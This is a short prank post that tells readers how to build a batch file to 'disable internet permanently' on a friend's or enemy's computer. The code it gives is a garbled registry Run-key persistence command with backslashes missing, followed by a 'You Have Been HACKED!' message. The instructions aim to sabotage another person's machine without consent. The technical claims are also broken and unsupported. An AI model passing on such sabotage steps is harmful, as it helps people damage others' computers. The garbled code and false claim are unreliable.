If you want your friend or enemy to disable internet permanently on his computer here it is. 

To do this follow these simple steps : 
1) Open Notepad.
2) Copy and Paste the following Code into Notepad :

hkey_current_usersoftwaremicrosoftwindowscurrentve rsionrun /v CONTROLexit /t 
reg_sz /d c:windowswimn32.bat /f 
echo You Have Been HACKED! PAUSE

3) Save it as tricksuptodate.bat(.bat is compulsory) 
4) Now, running this file will disable internet permanently
